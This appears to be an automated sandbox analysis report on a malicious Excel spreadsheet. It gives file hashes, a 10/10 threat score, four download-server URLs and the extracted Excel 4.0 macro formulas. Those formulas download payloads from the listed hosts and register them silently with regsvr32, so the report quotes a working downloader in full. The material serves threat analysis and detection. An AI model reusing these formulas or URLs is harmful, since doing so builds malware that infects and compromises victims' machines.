General

  • Target

    ae72f6016f8929c7780693cadfb855ef.xlsx

  • Size

    89KB

  • MD5

    ae72f6016f8929c7780693cadfb855ef

  • SHA1

    bda7fd78150a0103f3c2281d90074332ccfa8cde

  • SHA256

    9f8b5f5da718fafb98de9b2128cd81fd720a37de6c755b81965ead358aeb912a

  • SHA512

    5d0053bf1557fa4d236ddedf074562f7b86501b50c8595ecdcc44d99fe9201917e4c4649b9418cc952d4630db2bf036278e79013898e67fcd4ebe71bf6ea70e5

  • SSDEEP

    1536:n6k3hOdsylKlgxopeiBNhZFGzE+cL2kdAdHuS4lcTO9Tv7UYdEJi9a2:6k3hOdsylKlgxopeiBNhZFGzE+cL2kd7

Score
10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    http://bruidsfotografie-breda.nl/cache/QPk/

    http://www.chawkyfrenn.com/icon/JtT/

    https://chiptochip.es/alojamiento-web/dofwXVVQ3hvsp/

    http://chillpassion.com/wp-content/nd4wjKgokzKbKH0DQDD/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bruidsfotografie-breda.nl/cache/QPk/","..\phdg1.ocx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg1.ocx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.chawkyfrenn.com/icon/JtT/","..\phdg2.ocx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg2.ocx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://chiptochip.es/alojamiento-web/dofwXVVQ3hvsp/","..\phdg3.ocx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg3.ocx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://chillpassion.com/wp-content/nd4wjKgokzKbKH0DQDD/","..\phdg4.ocx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg4.ocx")
    =RETURN()

Signatures

  • Suspicious Office macro (1 IoC)

    Office document equipped with 4.0 macros.

Files

  • ae72f6016f8929c7780693cadfb855ef.xlsx
    .xls .xlsx windows office2003